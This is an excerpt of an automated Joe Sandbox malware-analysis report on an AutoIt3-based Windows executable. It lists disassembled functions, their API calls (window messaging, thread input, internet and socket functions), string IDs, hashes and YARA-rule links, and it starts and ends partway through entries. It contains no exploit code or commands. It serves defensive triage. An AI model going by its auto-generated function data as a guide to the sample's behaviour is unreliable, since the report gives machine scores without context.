                                                                                                                            • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                            • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                            • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                            • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                            Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                            • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                            • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2710830443-0
                                                                                                                            • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                            • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                            • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                            • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                            Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                              • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                              • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 146765662-0
                                                                                                                            • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                            • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                            • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                            • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                            Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                            • __freeptd.LIBCMT ref: 0041408A
                                                                                                                            • ExitThread.KERNEL32 ref: 00414093
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3182216644-0
                                                                                                                            • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                            • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                            • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                            • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                            Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                              • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                            • API String ID: 3380330463-3941886329
                                                                                                                            • Opcode ID: a9f97b6700f357a03770d98d5d55076cc5e2169ba658a06b5870c4020d3518f4
                                                                                                                            • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                            • Opcode Fuzzy Hash: a9f97b6700f357a03770d98d5d55076cc5e2169ba658a06b5870c4020d3518f4
                                                                                                                            • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                            Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID: 0vH
                                                                                                                            • API String ID: 1143807570-3662162768
                                                                                                                            • Opcode ID: 4a0c3e6e29e1d1bc7a3692a4260546dbd268f52409d69d207a9efd33b4fdebc2
                                                                                                                            • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                            • Opcode Fuzzy Hash: 4a0c3e6e29e1d1bc7a3692a4260546dbd268f52409d69d207a9efd33b4fdebc2
                                                                                                                            • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                            Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HH$HH
                                                                                                                            • API String ID: 0-1787419579
                                                                                                                            • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                            • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                            • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                            • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                            Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                            • Opcode ID: 661fa1af2a8bfdde850db679a74a64cd87ae05e24632a93af23ae5e89122f41c
                                                                                                                            • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                            • Opcode Fuzzy Hash: 661fa1af2a8bfdde850db679a74a64cd87ae05e24632a93af23ae5e89122f41c
                                                                                                                            • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                            Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: '
                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                            • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                            • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                            • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                            • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                            Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 0-4108050209
                                                                                                                            • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                            • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                            • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                            • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                            Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: Combobox
                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                            • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                            • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                            • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                            • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                            Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                            • String ID: edit
                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                            • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                            • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                            • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                            • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                            Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                            • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                            • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                            • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                            • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                            Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: htonsinet_addr
                                                                                                                            • String ID: 255.255.255.255
                                                                                                                            • API String ID: 3832099526-2422070025
                                                                                                                            • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                            • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                            • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                            • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                            Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                            • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                            • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                            • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                            • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                            Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InternetOpen
                                                                                                                            • String ID: <local>
                                                                                                                            • API String ID: 2038078732-4266983199
                                                                                                                            • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                            • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
